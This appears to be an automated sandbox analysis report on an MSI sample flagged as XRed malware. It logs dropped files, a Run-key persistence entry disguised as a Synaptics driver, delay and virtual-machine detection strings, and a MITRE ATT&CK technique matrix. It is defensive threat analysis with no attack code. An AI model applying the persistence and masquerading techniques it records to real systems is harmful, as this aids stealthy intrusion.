                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                          Source: xyxmml.msiStatic file information: File size 1757184 > 1048576
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files to the document folder of the user
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSID754.tmpJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID754.tmpJump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\Windows\SysWOW64\._cache_MSID754.tmpJump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\ProgramData\Synaptics\RCXDBF7.tmpJump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\ProgramData\Synaptics\RCXDBF7.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID754.tmpJump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpFile created: C:\Windows\SysWOW64\._cache_MSID754.tmpJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                          Source: C:\Windows\Installer\MSID754.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpDropped PE file which has not been started: C:\Windows\SysWOW64\._cache_MSID754.tmpJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7228Thread sleep time: -420000s >= -30000sJump to behavior
                          Source: C:\Windows\splwow64.exeLast function: Thread delayed
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpFile opened: C:\Users\userJump to behavior
                          Source: Amcache.hve.12.drBinary or memory string: VMware
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                          Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Installer\MSID754.tmpProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected XRed
                          Source: Yara matchFile source: xyxmml.msi, type: SAMPLE
                          Source: Yara matchFile source: 3.0.MSID754.tmp.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSID754.tmp PID: 7108, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Installer\63d57e.msi, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSID6D6.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXDBF7.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSID754.tmp, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected XRed
                          Source: Yara matchFile source: xyxmml.msi, type: SAMPLE
                          Source: Yara matchFile source: 3.0.MSID754.tmp.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSID754.tmp PID: 7108, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Installer\63d57e.msi, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSID6D6.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXDBF7.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSID754.tmp, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information41
                          Scripting                          		2
                          Replication Through Removable Media                          		Windows Management Instrumentation41
                          Scripting                          		11
                          Process Injection                          		132
                          Masquerading                          		OS Credential Dumping111
                          Security Software Discovery                          		Remote ServicesData from Local System1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		11
                          Virtualization/Sandbox Evasion                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop ProtocolData from Removable Media3
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Process Injection                          		Security Account Manager11
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Extra Window Memory Injection                          		1
                          Obfuscated Files or Information                          		NTDS11
                          Peripheral Device Discovery                          		Distributed Component Object ModelInput Capture34
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Software Packing                          		LSA Secrets3
                          File and Directory Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
